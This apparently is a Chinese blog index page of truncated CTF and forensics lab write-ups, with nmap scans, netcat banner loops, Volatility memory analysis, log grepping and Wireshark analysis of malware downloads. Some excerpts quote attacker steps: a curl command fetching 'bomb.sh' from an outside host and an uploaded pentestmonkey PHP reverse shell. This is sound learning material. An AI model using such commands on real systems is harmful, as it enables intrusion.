MikannseのSekai

端口扫描nmap --min-rate=10000 -p- 10.10.114.27Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-26 14:22 UTCNmap scan report for ip-10-10-114-27.eu-west-1.compute.internal (10.10.114.27)Host is up (0.0084s latency).Not shown: 65531 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh80/tcp open http139/tcp open netbios-ssn445/tcp open microsoft-dsMAC Address: 02:AB:07:41:29:CF (Unknown)Nmap done: 1 IP address (1 host up) scanned in 4.13 seconds nmap -sV -sT -sC -O -p22,80,139,445 10. ...

端口扫描nmap --min-rate=10000 -p- 10.10.255.237Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-24 06:43 UTCNmap scan report for ip-10-10-255-237.eu-west-1.compute.internal (10.10.255.237)Host is up (0.0091s latency).Not shown: 65533 closed tcp ports (reset)PORT STATE SERVICE8009/tcp open ajp138080/tcp open http-proxyMAC Address: 02:74:3F:1B:8A:3F (Unknown)Nmap done: 1 IP address (1 host up) scanned in 3.46 seconds nmap -sT -sV -sC -O -p8009,8080 10.10.255.237Starting Nmap 7.93 ( https://nm ...

端口扫描端口扫描，WTF直接干了几万个端口出来。看了下房间的提示，从1337端口开始 nc 10.10.200.74 1337 Welcome traveller, to the beginning of your journeyTo begin, find the trollfaceLegend says he's hiding in the first 100 portsTry printing the banners from the ports 提示让我们打印输出，nc一下1,2,3,端口试试发现回显了一行行的字符，写一个bash脚本来循环nc1至100端口并将输出保存下来 #!/bin/bash# 指定要连接的 IP 地址IP_ADDRESS="10.10.200.74"# 指定保存输出的文本文件OUTPUT_FILE="output.txt"# 循环连接端口范围，并将输出追加到文件for ((PORT=1; PORT<=100; PORT++)); do echo "Connecting to $IP_ADDRESS:$PO ...

端口扫描nmap --min-rate=10000 -p- 10.10.77.138Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-23 05:42 UTCNmap scan report for ip-10-10-77-138.eu-west-1.compute.internal (10.10.77.138)Host is up (0.0043s latency).Not shown: 65532 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh80/tcp open http5000/tcp open upnpMAC Address: 02:BB:D6:ED:30:03 (Unknown)Nmap done: 1 IP address (1 host up) scanned in 3.84 seconds nmap -sT -sV -sC -O -p22,80,5000 10.10.77.138Starting Nmap 7.93 ( ht ...

Volatility forensics这个转储文件的操作系统是什么？ python2 vol.py -f ~/桌面/victim.raw imageinfoVolatility Foundation Volatility Framework 2.6.1INFO : volatility.debug : Determining profile based on KDBG search... Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_24000, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_24000, Win7SP1x64_23418 AS Layer1 : WindowsAMD64PagedMemory (Kernel AS) AS Layer2 : FileAddressSpace (/home/mi ...

Task3用户使用提升的权限在计算机上安装了软件包。根据日志，完整的命令是什么？ cat /var/log/auth.log |grep install COMMAND=/usr/bin/apt install dokuwiki 运行上一个命令时，当前工作目录（PWD）是什么？ /home/cybert Task4在安装上一个任务中的程序包后创建了哪个用户？ cat /var/log/auth.log |grep useradd it-admin 一个用户后来被赋予了sudo特权。sudoers文件是什么时候更新的？ cat /var/log/auth.log |grep visudo Dec 28 06:27:34 使用“vi”文本编辑器打开脚本文件。这个文件的名称是什么？ cat /var/log/auth.log |grep vi bomb.sh Task5创建文件时使用的命令是什么 bomb.sh cat /home/it-admin/.bash curl 10.10.158.38:8080/bomb.sh –output bomb.sh 文件已重命名并移动到 ...

LoginWhat is John’s password? python3 vol.py -f ../../Snapshot6.vmem windows.infoVolatility 3 Framework 2.5.2WARNING volatility3.framework.layers.vmware: No metadata file found alongside VMEM file. A VMSS or VMSN file may be required to correctly process a VMEM file. These should be placed in the same directory with the same file name, e.g. Snapshot6.vmem and Snapshot6.vmss.Progress: 100.00 PDB scanning finished Variable ValueKernel Base 0xf80002 ...

收到攻击的主机ip应该是10.9.23.102 第一次HTTP连接到恶意IP的日期和时间是什么？ 选择wireshark最上方的”view->display format->UTC data time of day” 过滤http协议，第一条流量，右键copy->as filter 2021-09-24 16:44:38 下载的zip文件的名称是什么？ 也是第一条流量，documents.zip 托管恶意zip文件的域是什么？ 追踪第一条流量的http流，可以找到请求中的host是attirenepal.com 如果不下载文件，zip文件中的文件名是什么？ 在同一条流量中，能看到zip的文件头中chart-1530076591.xls 下载zip文件的恶意IP的Web服务器的名称是什么？ 在同一条流量中，server字段:LiteSpeed 上一个问题中的Web服务器版本是什么？ 同一条流量中x-powered-by字段:PHP/7.2.34 恶意文件从多个域下载到受害者主机。这项活动涉及哪三个 根据房间提示,https协议，并且有时间范围 既然有https，那么必然 ...

什么时候收到的: 6/10/20(最右上角) 谁发送的: Mr. James Jackson 他的电子邮件地址是什么: info@mutawamarine.com 什么电子邮件地址将收到回复此电子邮件: info.mutawamarine@mail.com 原始IP是什么: 10.201.192.162 右上角”more->view source” 谁是原始IP的所有者？ 使用: https://www.whois.com/whois 搜索192.119.71.157 Hostwinds LLC 返回路径域的SPF记录是什么: “返回域”（Return-Path）通常是指电子邮件中的一个字段，用于指定在邮件无法成功投递时接收反弹（bounces）或非递送通知的邮件地址 Sender Policy Framework（SPF）记录是一种DNS记录，通过指定哪些邮件服务器被授权代表域发送电子邮件 dig txt mutawamarine.com v=spf1 include:spf.protection.outlook.com -all 返回路径域的DMARC记录是什么: DMA ...

Task1打开access.log 根据User-agent都能找到，但是格式有点奇葩 nmap, hydra, sqlmap, curl, and feroxbuster /rest/user/login端点被hydra疯狂爆破 /rest/products/search被sqlmap攻击，参数是q /ftp端点允许下载服务器上的网站备份文件 Task2product reviews 产品评价 直接搜索”POST /rest/user/login HTTP/1.0” 200” Yay,11/Apr/2021:09:16:31 +0000 直接查看最后一条sql攻击，email password(没有id) 查看ftp协议，www-data.bak coupons_2013.md.bak 查看vsftpd.log ftp,anonymous 查看auth.log ssh,www-data 碎碎念没啥好说的

TASK1打开流量包，发现了一堆TCP和FTP协议的流量，所以是攻击的是FTP服务 爆破工具，所以是hydra 跟踪TCP流，用户名是jenny 筛选出ftp协议，并且找到显示登陆成功的那个响应，找到密码是password123 同样能找到工作目录是/var/www/html 后门服务是shell.php “ftp-data” 是指FTP（文件传输协议）数据通道上的数据包。FTP协议通常使用两个通道进行通信：命令通道（control channel）和数据通道（data channel）。命令通道用于发送控制命令，而数据通道用于传输实际的文件数据。 “ftp-data” 数据包是在数据通道上传输的文件数据的捕获。 筛选ftp-data协议，可以找到上传的php的webshell，可以找到 http://pentestmonkey.net/tools/php-reverse-shell (非常著名的pentestmonkey) 跟踪GETshell.php之后的TCP流，第一个命令执行的是whoami 主机名是wir3，在shell中每一行开头就是 python3 -c ‘import ...

端口扫描nmap --min-rate=10000 -p- 10.10.148.95Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-17 02:42 UTCNmap scan report for ip-10-10-148-95.eu-west-1.compute.internal (10.10.148.95)Host is up (0.0030s latency).Not shown: 65533 filtered tcp ports (no-response)PORT STATE SERVICE22/tcp open ssh80/tcp open httpMAC Address: 02:38:DE:53:EB:89 (Unknown)Nmap done: 1 IP address (1 host up) scanned in 13.40 seconds nmap -sT -sV -sC -O -p22,80 10.10.148.95Starting Nmap 7.93 ( https://nmap.org ) at 2 ...